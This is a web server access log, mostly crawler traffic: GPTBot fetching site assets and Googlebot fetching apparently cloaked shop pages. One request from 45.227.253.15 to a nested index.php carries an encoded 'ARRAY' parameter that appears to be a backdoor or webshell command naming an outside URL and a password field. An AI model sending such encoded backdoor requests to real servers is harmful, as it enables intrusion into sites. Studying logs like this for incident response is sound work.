20.171.207.166 - - [20/Jul/2025:08:21:23 +0000] "GET /otc/js/images/hairstyles/images/icon.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:22:27 +0000] "GET /otc/js/images/hairstyles/images/services/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:23:27 +0000] "GET /otc/js/images/hairstyles/images/background/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:24:28 +0000] "GET /otc/js/images/hairstyles/images/hairstyles/4.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:25:31 +0000] "GET /otc/js/images/hairstyles/images/misc/man-2.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.7 - - [20/Jul/2025:08:26:06 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/805770.shtml HTTP/1.1" 200 18063 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:08:26:34 +0000] "GET /otc/js/images/hairstyles/images/hairstyles/3.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:27:36 +0000] "GET /otc/js/images/hairstyles/images/services/3.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:28:38 +0000] "GET /otc/js/images/hairstyles/images/hairstyles/2.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:29:40 +0000] "GET /otc/js/images/hairstyles/js/designesia.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:30:41 +0000] "GET /otc/js/images/hairstyles/images/hairstyles/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.6 - - [20/Jul/2025:08:31:15 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/804960.shtml HTTP/1.1" 200 20493 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:08:31:43 +0000] "GET /otc/js/images/hairstyles/images/background/7.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:32:44 +0000] "GET /api/js/images/hairstyles/css/style.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:33:50 +0000] "GET /apis/js/images/misc/man.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:34:56 +0000] "GET /shopdetail/js/images/background/images/hairstyles/css/colors/scheme-01.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:35:58 +0000] "GET /shopdetail/js/images/background/images/hairstyles/css/plugins.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.7 - - [20/Jul/2025:08:36:24 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/6380960.shtml HTTP/1.1" 200 18621 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:08:37:04 +0000] "GET /otc/js/images/hairstyles/images/hairstyles/3.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:38:09 +0000] "GET /shopdetail/js/images/background/images/hairstyles/css/bootstrap.min.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:39:12 +0000] "GET /shopdetail/js/images/background/images/hairstyles/css/mdb.min.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:40:12 +0000] "GET /shopdetail/js/images/background/images/hairstyles/css/style.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:41:14 +0000] "GET /shopdetail/js/images/background/images/hairstyles/css/coloring.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.6 - - [20/Jul/2025:08:41:35 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/181394.shtml HTTP/1.1" 200 18060 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:08:42:18 +0000] "GET /shopdetail/js/images/background/images/misc/css/plugins.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:43:24 +0000] "GET /shopdetail/js/images/background/images/misc/css/style.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:44:28 +0000] "GET /shopdetail/js/images/background/images/misc/css/colors/scheme-01.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:45:30 +0000] "GET /shopdetail/js/images/background/images/misc/css/bootstrap.min.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:46:36 +0000] "GET /shopdetail/js/images/background/images/misc/css/coloring.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.6 - - [20/Jul/2025:08:46:42 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/6343770.shtml HTTP/1.1" 200 18697 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.7 - - [20/Jul/2025:08:46:44 +0000] "POST /get-message-notify HTTP/1.1" 200 18527 "https://king-babylon.hair/?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/6343770.shtml" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:08:47:40 +0000] "GET /shopdetail/js/images/background/images/misc/css/mdb.min.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:48:41 +0000] "GET /otc/images/services/images/services/js/plugins.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:49:44 +0000] "GET /otc/images/services/images/services/css/mdb.min.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:50:48 +0000] "GET /otc/images/services/images/services/js/custom-marquee.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:51:51 +0000] "GET /otc/images/services/images/services/css/style.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.7 - - [20/Jul/2025:08:51:53 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/5050914.shtml HTTP/1.1" 200 18467 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:08:52:54 +0000] "GET /otc/images/services/images/services/css/colors/scheme-01.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:53:55 +0000] "GET /otc/images/services/images/services/js/designesia.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:54:56 +0000] "GET /otc/images/services/images/services/css/plugins.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:56:01 +0000] "GET /otc/images/services/images/services/css/bootstrap.min.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.5 - - [20/Jul/2025:08:56:58 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/13484936.shtml HTTP/1.1" 200 19735 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:08:57:07 +0000] "GET /otc/images/services/images/services/css/coloring.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:58:12 +0000] "GET /fePublicInfo/js/images/hairstyles/js/css/plugins.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:08:59:15 +0000] "GET /fePublicInfo/js/images/hairstyles/js/css/colors/scheme-01.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:00:15 +0000] "GET /fePublicInfo/js/images/hairstyles/js/css/mdb.min.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:01:16 +0000] "GET /fePublicInfo/js/images/hairstyles/js/css/bootstrap.min.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.7 - - [20/Jul/2025:09:02:06 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/732180.shtml HTTP/1.1" 200 19605 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:09:02:17 +0000] "GET /fePublicInfo/js/images/hairstyles/js/css/coloring.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:03:20 +0000] "GET /fePublicInfo/js/images/hairstyles/js/css/style.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:04:24 +0000] "GET /035/images/services/images/background/css/style.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:05:30 +0000] "GET /035/images/services/images/background/js/custom-marquee.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:06:32 +0000] "GET /035/images/services/images/background/js/designesia.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.7 - - [20/Jul/2025:09:07:21 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/673436.shtml HTTP/1.1" 200 18154 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:09:07:34 +0000] "GET /035/images/services/images/background/css/colors/scheme-01.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:08:38 +0000] "GET /035/images/services/images/background/css/bootstrap.min.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:09:44 +0000] "GET /035/images/services/images/background/css/coloring.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:10:47 +0000] "GET /035/images/services/images/background/js/plugins.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:11:52 +0000] "GET /035/images/services/images/background/css/mdb.min.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.7 - - [20/Jul/2025:09:12:24 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/27402170.shtml HTTP/1.1" 200 23462 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:09:12:57 +0000] "GET /035/images/services/images/background/css/plugins.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:14:01 +0000] "GET /apis/images/images/misc/css/colors/scheme-01.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:15:05 +0000] "GET /apis/images/images/misc/css/bootstrap.min.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:16:06 +0000] "GET /apis/images/images/misc/js/custom-marquee.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:17:07 +0000] "GET /apis/images/images/misc/css/coloring.css HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.7 - - [20/Jul/2025:09:17:32 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/27402454.shtml HTTP/1.1" 200 20651 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.6 - - [20/Jul/2025:09:17:46 +0000] "POST /get-message-notify HTTP/1.1" 200 18527 "https://king-babylon.hair/?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/27402454.shtml" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:09:18:09 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/logo-mobile.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:19:13 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/hairstyles/4.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:20:16 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/services/3.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.6 - - [20/Jul/2025:09:21:01 +0000] "GET / HTTP/1.1" 200 18263 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.157 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:09:21:18 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/hairstyles/3.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:22:22 +0000] "GET /fePublicInfo/js/images/hairstyles/js/js/designesia.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.5 - - [20/Jul/2025:09:22:41 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/71954.shtml HTTP/1.1" 200 17769 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:09:23:27 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/hairstyles/6.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:24:31 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/misc/man.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:25:34 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/misc/man-2.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:26:37 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/hairstyles/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:27:42 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/icon.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.6 - - [20/Jul/2025:09:27:49 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/750134.shtml HTTP/1.1" 200 18555 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:09:28:46 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/services/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:29:52 +0000] "GET /fePublicInfo/js/images/hairstyles/js/js/plugins.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:30:57 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/logo.png HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
45.227.253.15 - - [20/Jul/2025:09:31:00 +0000] "GET /src/src/src/src/src/index.php?ARRAY=7o2230223n313735333030373536382p2231223n22687474703n5p2s5p2s7n7334393476313373752r74616368652r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313735333030333936382q3061356666363831656335623162313064386262323531613833386464363565222p2232223n226332363933316564393130393033663639343939666662613962613838363835222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p2262696r675s70617373223n2232392q33352q35332q36382q37332q38362q3330227q HTTP/1.1" 200 - "-" "Mozilla/5.0 (iPad; U; CPU OS 4_2_3 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5"
20.171.207.166 - - [20/Jul/2025:09:32:02 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/background/7.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.5 - - [20/Jul/2025:09:32:58 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/725540.shtml HTTP/1.1" 200 18640 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:09:33:05 +0000] "GET /fePublicInfo/js/images/hairstyles/js/js/custom-marquee.js HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.6 - - [20/Jul/2025:09:33:08 +0000] "POST /get-message-notify HTTP/1.1" 200 18527 "https://king-babylon.hair/?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/725540.shtml" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:09:34:06 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/services/2.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:35:07 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/hairstyles/5.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:36:11 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/hairstyles/2.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.166 - - [20/Jul/2025:09:37:14 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/services/4.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.6 - - [20/Jul/2025:09:38:07 +0000] "GET /?p=5098417001400&mod=51ef186e&uri=itm.php?shopdetail/29875116.shtml HTTP/1.1" 200 20914 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.166 - - [20/Jul/2025:09:38:15 +0000] "GET /fePublicInfo/js/images/hairstyles/js/images/background/1.jpg HTTP/1.1" 200 3723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
